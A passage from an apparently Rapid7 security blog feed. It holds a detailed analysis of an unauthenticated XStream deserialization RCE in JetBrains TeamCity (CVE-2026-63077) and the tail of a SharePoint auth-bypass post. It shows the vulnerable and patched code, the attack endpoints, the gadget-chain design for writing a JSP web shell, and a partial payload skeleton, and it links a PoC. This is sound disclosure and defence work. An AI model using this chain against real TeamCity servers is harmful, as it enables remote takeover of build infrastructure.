{"odata.metadata":"https://win-b0i6kv698ls/_api/$metadata#SP.ContextWebInformation","FormDigestTimeoutSeconds":1800,"FormDigestValue":"0x08350AA4E26C638120137515168806E0389312ED89151357A505BA8F1F7B4992AAAF9A15D4DD3D5E43ACADE857B5AE5BFFCA753401F5E5A0C3EB6F483E4188E2,21 Apr 2026 10:06:12 -0000","LibraryVersion":"16.0.19725.20210","SiteFullUrl":"https://win-b0i6kv698ls","SupportedSchemaVersions":["14.0.0.0","15.0.0.0"],"WebFullUrl":"https://win-b0i6kv698ls"}</pre><p></p><p><span style='font-size: undefined;'>With authentication bypassed, and with a valid form digest, the remote attacker can begin to interact with the authenticated attack surface of the target SharePoint site.</span></p><h2><span style='font-size: undefined;'>Upcoming webinar</span></h2><p>Interested in the AI tooling leveraged throughout the research process? Join Rapid7's Stephen Fewer and Douglas McKee on Thursday, August 13 to walk through the full exploit chain, actionable next steps and more. <a href="https://www.brighttalk.com/webcast/10457/673829?utm_source=Rapid7&amp;utm_medium=brighttalk&amp;utm_medium=organic-social&amp;utm_campaign=673829%3Futm_source%3Dlinkedin&amp;utm_campaign=global-mdr-q3-2026-global-webinar-prospect-eng-etos-25&amp;utm_content=microsoft-sharepoint-webinar&amp;utm_term=touch1" target="_blank">Register here</a>.<br/></p>]]></description>
      <link>https://www.rapid7.com/blog/post/ra-microsoft-sharepoint-jwt-token-authentication-bypass-cve-2026-55040</link>
      <guid isPermaLink="false">blt59f5963a5afdb8e9</guid>
      <category><![CDATA[Rapid7 Analysis]]></category>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Vulnerability Disclosure]]></category><dc:creator><![CDATA[Stephen Fewer]]></dc:creator>
      <pubDate>Tue, 11 Aug 2026 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcbf09ec3af35e28e/6a15c63f08221ed5144dbf77/webinar-rapid7-logo.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 Analysis: Unauthenticated Remote Code Execution in JetBrains TeamCity (CVE-2026-63077)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 27, 2026, JetBrains published a </span><a href="https://blog.jetbrains.com/teamcity/2026/07/cve-2026-63077/"><span style='font-size: undefined;'>security advisory</span></a><span style='font-size: undefined;'> for </span><a href="https://www.rapid7.com/db/vulnerabilities/cve-2026-63077/"><span style='font-size: undefined;'>CVE-2026-63077</span></a><span style='font-size: undefined;'>, a critical unsafe deserialization vulnerability affecting JetBrains </span><a href="https://www.jetbrains.com/teamcity/"><span style='font-size: undefined;'>TeamCity</span></a><span style='font-size: undefined;'>. An attacker who can reach a TeamCity server over HTTP or HTTPS can exploit the agent polling protocol without credentials and execute operating system commands with the privileges of the TeamCity server process.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>JetBrains reported no known active exploitation when it disclosed the vulnerability. However, on August 5, 2026, CISA added CVE-2026-63077 to its </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-63077"><span style='font-size: undefined;'>Known Exploited Vulnerabilities</span></a><span style='font-size: undefined;'> (KEV) catalog, confirming exploitation in the wild.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Our analysis finds that a vulnerable TeamCity server creates a permissive XStream allowlist. This allowlist is intended to restrict which Java classes can be deserialized when servicing unauthenticated agent requests. However, this allowlist incorrectly adds TeamCity protocol classes without removing XStream's existing default permissions. This introduces an unsafe deserialization issue. A patched TeamCity server remediates this by adding </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>NoTypePermission.NONE</span></span><span style='font-size: undefined;'> before the TeamCity allowlist, which removes the default permissions and makes the allowlist exclusive. </span></p><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>Rapid7 Labs has verified that the patch successfully remediates the exploit described in this analysis. A proof-of-concept script for CVE-2026-63077 can be found </span><a href="https://github.com/sfewer-r7/CVE-2026-63077"><span style='font-size: undefined;'>here</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Analysis</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Our analysis compares a vulnerable TeamCity version </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>2026.1.2</span></span><span style='font-size: undefined;'> against a patched version </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>2026.1.3</span></span><span style='font-size: undefined;'>.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>TeamCity uses a central server to coordinate builds and separate build agents to run them. An agent can communicate with the server through the agent polling protocol: it registers, asks the server for its next command, and reports whether that command succeeded or failed. The endpoints under </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/app/agents/v1</span></span><span style='font-size: undefined;'> support this agent communication channel rather than the TeamCity web interface or REST API. A </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TeamCity-AgentSessionId</span></span><span style='font-size: undefined;'> HTTP header value identifies a polling connection, but it does not mean that either a user or agent has authenticated to TeamCity, as access to many agent endpoints remains unauthenticated.</span></p><p></p><p style="direction: ltr;"><a href="https://x-stream.github.io/"><span style='font-size: undefined;'>XStream</span></a><span style='font-size: undefined;'> is a Java library that converts object graphs to XML and reconstructs those graphs from XML. An </span><a href="https://x-stream.github.io/graphs.html"><span style='font-size: undefined;'>object graph</span></a><span style='font-size: undefined;'> can contain nested objects, collection entries, private fields, and references to an object that appeared earlier in the document. XStream aliases give Java types shorter XML names. For example, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>&lt;linked-hash-map&gt;</span></span><span style='font-size: undefined;'> is XStream's alias for </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>java.util.LinkedHashMap</span></span><span style='font-size: undefined;'>. Nested element names and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>class</span></span><span style='font-size: undefined;'> attributes select other concrete Java types, while reference attributes point back to objects that XStream has already constructed. Converters and reflection-based code then allocate the selected types and populate their fields.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Patch diff</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The class </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>jetbrains.buildServer.messages.XStreamHolder</span></span><span style='font-size: undefined;'> is TeamCity's wrapper for creating and configuring XStream instances. TeamCity </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>2026.1.2</span></span><span style='font-size: undefined;'> creates an instance of </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>XStreamHolder</span></span><span style='font-size: undefined;'>, configures it, and then calls </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>setupSecurityIfNeeded()</span></span><span style='font-size: undefined;'>. If the TeamCity allowlists contain entries, this method adds those entries to the permissions that XStream already installed:</span></p><p><span style='font-size: undefined;'></span></p><pre language="java">// ./webapps/ROOT/WEB-INF/lib/messages.jar
package jetbrains.buildServer.messages;

public class XStreamHolder {

// ...

private void setupSecurityIfNeeded(XStreamWrapper xStream) {
  if (this.myAdditionalClassesWhiteList.isEmpty()
            && OUR_STATIC_CLASSES_WHITE_LIST.isEmpty()) {
    XStreamHolder.setupDefaultSecurityOldWay(xStream);
    return;
  }
    xStream.allowTypes(OUR_STATIC_CLASSES_WHITE_LIST.keySet()
        .toArray(new String[0]));                         // &lt;--- [1]
    xStream.allowTypes(this.myAdditionalClassesWhiteList
        .toArray(new String[0]));                         // &lt;--- [2]
}</pre><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>The calls at </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[1]</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[2]</span></span><span style='font-size: undefined;'> do not start from an empty permission set. The bundled XStream </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>1.4.20.3</span></span><span style='font-size: undefined;'> constructor has already called </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>setupSecurity()</span></span><span style='font-size: undefined;'>, which permits several broad type hierarchies, including </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Map</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Throwable</span></span><span style='font-size: undefined;'>:</span></p><p style="direction: ltr;"><span style='color:rgb(184, 6, 114);font-size: undefined;'></span></p><pre language="java">// ./webapps/ROOT/WEB-INF/lib/xstream.jar
package com.thoughtworks.xstream;

public class XStream {
// ...

protected void setupSecurity() {
  if (this.securityMapper == null)
    return; 
  addPermission(NoTypePermission.NONE);          // &lt;--- Clears all existing permissions
  addPermission(NullPermission.NULL);
  addPermission(PrimitiveTypePermission.PRIMITIVES);
  addPermission(ArrayTypePermission.ARRAYS);
  addPermission(InterfaceTypePermission.INTERFACES);
  allowTypeHierarchy(Calendar.class);
  allowTypeHierarchy(Collection.class);
  allowTypeHierarchy(Map.class);                 // &lt;--- Map is allowed
  allowTypeHierarchy(Map.Entry.class);
  allowTypeHierarchy(Member.class);
  allowTypeHierarchy(Number.class);
  allowTypeHierarchy(Throwable.class);           // &lt;--- Throwable is allowed
  allowTypeHierarchy(TimeZone.class);
  // ...</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Therefore, even though TeamCity has not explicitly allowed any types, several allowed types are already present on the permission list due to XStream's defaults. This is enough to lead to unsafe deserialization.</span></p><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The patch from version </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>2026.1.3</span></span><span style='font-size: undefined;'> can be seen in the diff below and shows how these default allowed types are now cleared by TeamCity:</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="diff">+import com.thoughtworks.xstream.security.NoTypePermission;

+private static volatile boolean isWhiteListForced = true;

+public static void forceWhiteList(boolean force) {
+    isWhiteListForced = force;
+}

 private void setupSecurityIfNeeded(XStreamWrapper xStream) {
     if (this.myAdditionalClassesWhiteList.isEmpty()
             && OUR_STATIC_CLASSES_WHITE_LIST.isEmpty()) {
         XStreamHolder.setupDefaultSecurityOldWay(xStream);
         return;
     }
+    if (isWhiteListForced) {
+        xStream.addPermission(NoTypePermission.NONE);    // &lt;--- [3] Clears all existing permissions
+    }
     xStream.allowTypes(OUR_STATIC_CLASSES_WHITE_LIST.keySet()
         .toArray(new String[0]));
     xStream.allowTypes(this.myAdditionalClassesWhiteList
         .toArray(new String[0]));
 }</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The patched initializer turns the new behavior on before it populates the static allowlist:</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="diff"> public static void initializeWhiteList() {
     String string = TeamCityProperties.getProperty(
         (String)"teamcity.xstream.additionalAllowedClassNames", (String)""
     );
     if ("*".equals(string)) {
         return;
     }
+    XStreamHolder.forceWhiteList((boolean)TeamCityProperties.getBooleanOrTrue(
+        (String)"teamcity.xstream.whiteList.forced"
+    ));                                                     // &lt;--- [4]
     XStreamHolder.addClassesWhiteList((String[])CLASSES_WHITE_LIST);
     XStreamHolder.addClassesWhiteList((String[])string.split(","));
 }</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>XStream's </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SecurityMapper.addPermission()</span></span><span style='font-size: undefined;'> clears its permission list when it receives </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>NoTypePermission.NONE</span></span><span style='font-size: undefined;'>. The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>allowTypes</span></span><span style='font-size: undefined;'> calls that follow </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[3]</span></span><span style='font-size: undefined;'> now operate on a deny-by-default baseline, i.e., </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Map</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Throwable</span></span><span style='font-size: undefined;'> are no longer allowed types. The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TeamCityProperties.getBooleanOrTrue()</span></span><span style='font-size: undefined;'> call at </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[4]</span></span><span style='font-size: undefined;'> means the new property defaults to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>true</span></span><span style='font-size: undefined;'>, so clearing the permission list at </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[3]</span></span><span style='font-size: undefined;'> will now occur by default on a patched server.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Root cause</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The missing XStream class type permission reset is the root cause of CVE-2026-63077. TeamCity treats the configured classes as an allowlist, but XStream evaluates them alongside its earlier default permissions. In Java, a type hierarchy permission covers implementations and subclasses, not only the named type. Permitting </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Map</span></span><span style='font-size: undefined;'> therefore covers classes that implement </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Map</span></span><span style='font-size: undefined;'> such as </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>LinkedHashMap</span></span><span style='font-size: undefined;'>, while permitting </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Throwable</span></span><span style='font-size: undefined;'> covers exception subclasses such as </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>RuntimeException</span></span><span style='font-size: undefined;'>. These broad permissions expose enough object construction and reconstruction callbacks to assemble a working gadget chain.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The exploit also depends on how XStream's reflection converter handles declared fields and object references. Java reflection lets code inspect a class's field definitions at runtime and assign values to an object's fields. An explicitly represented </span><span style='font-size: undefined;'><span data-type='inlineCode'>class</span></span><span style='font-size: undefined;'> name or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>class</span><span style='font-size: undefined;'> attribute passes through </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SecurityMapper.realClass()</span></span><span style='font-size: undefined;'>. By contrast, an exact declared field already provides its Java type, allowing XStream to allocate that field without a second explicit type lookup. An XPath reference can then reuse the allocated object without another type check when the reference omits the redundant concrete </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>class</span></span><span style='font-size: undefined;'> attribute. In this context, XPath is an address within the XML object graph, not a query against TeamCity data.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Applied here, this allows a deserialization payload that begins with TeamCity's </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HSQLMetadataStorage$SchemaMismatchException</span></span><span style='font-size: undefined;'>. This class extends </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>RuntimeException</span></span><span style='font-size: undefined;'>, so XStream accepts it under the default </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Throwable</span></span><span style='font-size: undefined;'> hierarchy permission. Because it is a non-static inner class, it has a compiler-generated field pointing to its enclosing </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HSQLMetadataStorage</span></span><span style='font-size: undefined;'> instance. From there, the exact declared fields </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>myHSQLStorage</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>myDataSource</span></span><span style='font-size: undefined;'> lead XStream to an </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>org.apache.commons.dbcp2.BasicDataSource</span></span><span style='font-size: undefined;'>. XStream follows those field types without resolving </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BasicDataSource</span></span><span style='font-size: undefined;'> from an explicit element name or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>class</span></span><span style='font-size: undefined;'> attribute, even though TeamCity </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>2026.1.2</span></span><span style='font-size: undefined;'> rejects that class when the XML names it directly. The patched version </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>2026.1.3</span></span><span style='font-size: undefined;'> stops the chain earlier by rejecting </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SchemaMismatchException</span></span><span style='font-size: undefined;'>, which is absent from TeamCity's explicit protocol allowlist.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Triggering the vulnerability</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>First, the server accepts an agent registration request via an HTTP POST to the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/app/agents/v1/register</span></span><span style='font-size: undefined;'> endpoint, and returns a new session identifier in the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TeamCity-AgentSessionId</span></span><span style='font-size: undefined;'> response header.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The attacker then sends arbitrary XML to the error command endpoint with that server-issued session header via an HTTP POST to the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/app/agents/v1/commands/error</span></span><span style='font-size: undefined;'> endpoint. The handler for this endpoint is the method </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>handleCommands</span></span><span style='font-size: undefined;'>, shown below. This will validate the incoming request’s </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TeamCity-AgentSessionId</span></span><span style='font-size: undefined;'> header before calling the handler for the error command.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="java">// ./webapps/ROOT/WEB-INF/lib/web-core.jar
package jetbrains.buildServer.controllers.agentServer;
private ModelAndView handleCommands(
          HttpServletRequest request,
          HttpServletResponse response,
          String[] path) throws Exception {
      String sessionId = request.getHeader("TeamCity-AgentSessionId");
      BuildAgentEx agent =
          sessionId != null ? findAgentBySessionId(sessionId) : null; // &lt;--- validate agent session ID
      // This check occurs before the vulnerable handler is reached.
      if (agent == null) {
          response.setStatus(401);
          response.getWriter().write("Agent's session is not found");
          return null;
      }
      PollingRemoteAgentConnection connection =
          (PollingRemoteAgentConnection) agent.getConnection();
      if (path.length == 4) {
          String operation = path[3];
          if (operation.equals("error")) {
              getCommandsProcessor().handleCommandIsFailedRequest(
                  connection, request, response
              ); // &lt;--- call the error handler
          }
      }
      return null;
  }</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The method </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>handleCommandIsFailedRequest</span></span><span style='font-size: undefined;'> will then proceed to unsafely deserialize the incoming request’s XML body.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="java">// ./webapps/ROOT/WEB-INF/lib/web-core.jar
package jetbrains.buildServer.controllers.agentServer;

abstract class AbstractAgentCommandsRequestsProcessor implements AgentCommandsRequestsProcessor {
// ...

public void handleCommandIsFailedRequest(
        PollingRemoteAgentConnection connection,
        HttpServletRequest request,
        HttpServletResponse response) throws IOException {
    Error error = Error.fromXml(
        StreamUtil.readTextFrom(request.getReader())
    ); // &lt;--- deserialize attacker's XML

    // ...
}</pre><p></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>Error.fromXml()</span><span style='font-size: undefined;'> calls </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>XStreamWrapper.deserializeObject()</span><span style='font-size: undefined;'>. By providing a suitable gadget chain in the incoming request’s XML body, we can achieve unauthenticated RCE via unsafe deserialization.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>The gadget chain</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The gadget chain's objective is to make TeamCity call </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BasicDataSource.getConnection()</span></span><span style='font-size: undefined;'> on an attacker-configured object. That getter starts the following path from deserialization to command execution:</span></p><p></p><ol><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>The payload reconstructs a </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BasicDataSource</span></span><span style='font-size: undefined;'> configured to use TeamCity's bundled HSQLDB driver.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>A collection callback causes FreeMarker to resolve the JavaBean property </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>connection</span></span><span style='font-size: undefined;'>, which invokes </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BasicDataSource.getConnection()</span></span><span style='font-size: undefined;'>.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Apache DBCP opens a new in-memory HSQLDB database and executes the SQL in </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>connectionInitSqls</span></span><span style='font-size: undefined;'>.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>The final SQL statement uses HSQLDB's </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SCRIPT</span></span><span style='font-size: undefined;'> command to write a malicious JSPWS file into TeamCity's webroot.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>The attacker makes an HTTP request to that JSP file, executing the script's contents server-side, for example </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Runtime.getRuntime().exec()</span></span><span style='font-size: undefined;'> can be used to execute an attacker-controlled OS command.</span></p></li></ol><p style="direction: ltr;"><span style='font-size: undefined;'>The first four steps occur while TeamCity handles the malicious XML request. The fifth requires a second HTTP request. The object graph exists to solve two problems in the first two steps: XStream rejects </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BasicDataSource</span></span><span style='font-size: undefined;'> when the XML names it directly, and merely constructing a datasource does not call its </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>getConnection()</span></span><span style='font-size: undefined;'> method. </span></p><h4 style="direction: ltr;"><span style='color:rgb(102, 102, 102);'>Object graph construction</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>The payload's XML root is a three-entry </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>LinkedHashMap</span></span><span style='font-size: undefined;'>. Entry one constructs and configures the datasource without naming its concrete class in a new XML node. Entry two presents that datasource to FreeMarker as an object whose properties can be read by name. Entry three forces a lookup of the property named </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>connection</span></span><span style='font-size: undefined;'>.</span></p><p></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2a835b1e1c45ab1a/6a75f185be33783f5ddaccb8/figure1.png" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="figure1.png" asset-alt="figure1.png" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2a835b1e1c45ab1a/6a75f185be33783f5ddaccb8/figure1.png" data-sys-asset-uid="blt2a835b1e1c45ab1a" data-sys-asset-filename="figure1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="figure1.png" sys-style-type="display"/></figure><p style="text-align: center;"><span style='font-size: undefined;'><em>Figure 1: High-level gadget chain flow to </em></span><span style='font-size: undefined;'>BasicDataSource.getConnection()</span><span style='font-size: undefined;'><em>.</em></span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The entries appear in this order in the XML because the later entries refer to objects created by the earlier ones. XStream reconstructs them in document order, and the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>LinkedHashMap</span></span><span style='font-size: undefined;'> retains their insertion order in the resulting Java object.</span></p><h5 style="direction: ltr;"><span style='color:rgb(102, 102, 102);'>Entry one: construct and configure the datasource</span></h5><p style="direction: ltr;"><span style='font-size: undefined;'>The first entry begins with </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HSQLMetadataStorage$SchemaMismatchException</span></span><span style='font-size: undefined;'>. This class extends </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>RuntimeException</span></span><span style='font-size: undefined;'>, so XStream accepts it under the default </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Throwable</span></span><span style='font-size: undefined;'> hierarchy permission. It is a non-static Java inner class, which means the compiler gives each instance a hidden </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>this$0</span><span style='font-size: undefined;'> field pointing to its enclosing </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HSQLMetadataStorage</span></span><span style='font-size: undefined;'> object. XStream serializes that compiler-generated reference as </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>outer-class</span></span><span style='font-size: undefined;'>.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The enclosing </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HSQLMetadataStorage</span></span><span style='font-size: undefined;'> declares a field named </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>myHSQLStorage</span></span><span style='font-size: undefined;'> with the exact type </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HSQLStorage</span></span><span style='font-size: undefined;'>. That class, in turn, declares </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>myDataSource</span></span><span style='font-size: undefined;'> with the exact type </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BasicDataSource</span></span><span style='font-size: undefined;'>. Because the XML does not represent either field with a new element type or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>class</span></span><span style='font-size: undefined;'> attribute, XStream follows the declared Java field types without performing another explicit lookup for those classes:</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="xml">&lt;jetbrains.buildServer.serverSide.metadata.impl.metadata.HSQLMetadataStorage_-SchemaMismatchException&gt;
  &lt;outer-class&gt;
    &lt;myHSQLStorage&gt;
      &lt;myDataSource&gt;
        &lt;driverClassName&gt;org.hsqldb.jdbc.JDBCDriver&lt;/driverClassName&gt;
        &lt;url&gt;jdbc:hsqldb:mem:&lt;random&gt;&lt;/url&gt;
        &lt;userName&gt;SA&lt;/userName&gt;
        &lt;connectionInitSqls&gt;
&lt;!-- attacker-controlled HSQLDB statements --&gt;
&lt;/connectionInitSqls&gt;
      &lt;/myDataSource&gt;
    &lt;/myHSQLStorage&gt;
  &lt;/outer-class&gt;
&lt;/jetbrains.buildServer.serverSide.metadata.impl.metadata.HSQLMetadataStorage_-SchemaMismatchException&gt;</pre><p></p><p><span style='font-size: undefined;'>XStream encodes the dollar sign in a Java inner-class name as </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>_-</span></span><span style='font-size: undefined;'> when it creates an XML element name. The element ending in </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HSQLMetadataStorage_-SchemaMismatchException</span></span><span style='font-size: undefined;'> therefore identifies the Java class </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HSQLMetadataStorage$SchemaMismatchException</span></span><span style='font-size: undefined;'>.</span></p><h5 style="direction: ltr;"><span style='color:rgb(102, 102, 102);'>Entry two: expose the datasource through FreeMarker</span></h5><p style="direction: ltr;"><span style='font-size: undefined;'>The first entry leaves a configured datasource in memory, but nothing has called it. The second entry makes its JavaBean properties available through a FreeMarker </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HashAdapter</span></span><span style='font-size: undefined;'>. </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HashAdapter</span></span><span style='font-size: undefined;'> extends </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>AbstractMap</span></span><span style='font-size: undefined;'>, so XStream accepts the explicit class under its default </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Map</span></span><span style='font-size: undefined;'> hierarchy permission.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The adapter needs a FreeMarker model that can read properties from the datasource. The payload creates a </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BooleanModel</span></span><span style='font-size: undefined;'> through the exact </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BeansWrapper.falseModel</span></span><span style='font-size: undefined;'> field, then populates the model's inherited </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span 